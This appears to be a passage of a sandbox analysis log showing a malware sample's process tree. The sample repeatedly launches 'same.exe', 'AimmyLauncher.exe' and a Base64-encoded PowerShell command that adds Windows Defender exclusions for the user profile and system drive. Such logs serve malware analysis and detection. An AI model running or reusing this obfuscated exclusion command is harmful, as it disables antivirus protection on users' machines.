C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
28⤵
PID:7956

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
28⤵
PID:7964

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
28⤵
PID:7980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
29⤵
PID:7728

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
29⤵
PID:7860

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
29⤵
PID:7832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
30⤵
PID:8008

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
30⤵
PID:7508

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
30⤵
PID:7620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
31⤵
PID:7348

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
31⤵
PID:7308

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
31⤵
PID:7412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
32⤵
PID:7108

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
32⤵
PID:7152

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
32⤵
PID:6452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
33⤵
PID:7684

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
33⤵
PID:7216

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
33⤵
PID:7344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
34⤵
PID:6452

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
34⤵
PID:7712

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
34⤵
PID:7948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
35⤵
PID:4672

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
35⤵
PID:7236

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
35⤵
PID:772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
36⤵
PID:7480

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
36⤵
PID:7360

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
36⤵
PID:2344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
37⤵
PID:6948

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
37⤵
PID:4324

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
37⤵
PID:8200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
38⤵
PID:8512

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
38⤵
PID:8520

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
38⤵
PID:8528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
39⤵
PID:8916

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
39⤵
PID:8924

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
39⤵
PID:8932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
40⤵
PID:4368

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
40⤵
PID:8236

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
40⤵
PID:8304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
41⤵
PID:8756

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
41⤵
PID:8764

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
41⤵
PID:8772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
42⤵
PID:9160

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
42⤵
PID:9124

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
42⤵
PID:8932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
43⤵
PID:8900

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
43⤵
PID:9028

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
43⤵
PID:9052

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
44⤵
PID:8532

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
44⤵
PID:9040

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
44⤵
PID:8504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
45⤵
PID:9220

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
45⤵
PID:9228

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
45⤵
PID:9236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
46⤵
PID:9484

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
46⤵
PID:9492

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
46⤵
PID:9500

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
47⤵
PID:9848

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
47⤵
PID:9876

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
47⤵
PID:9884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
48⤵
PID:10144

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
48⤵
PID:10152

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
48⤵
PID:10160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
49⤵
PID:9236

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
49⤵
PID:8648

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
49⤵
PID:8372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
50⤵
PID:9888

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
50⤵
PID:10204

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
50⤵
PID:10212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
51⤵
PID:7972

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
51⤵
PID:10040

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
51⤵
PID:7156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
52⤵
PID:9728

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
52⤵
PID:9432

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
52⤵
PID:9520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
53⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
53⤵
PID:6960

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
53⤵
PID:9436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
54⤵
PID:10388

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
54⤵
PID:10404

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
54⤵
PID:10412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
55⤵
PID:10672

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
55⤵
PID:10684

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
55⤵
PID:10692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
56⤵
PID:10920

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
56⤵
PID:10936

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
56⤵
PID:10944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
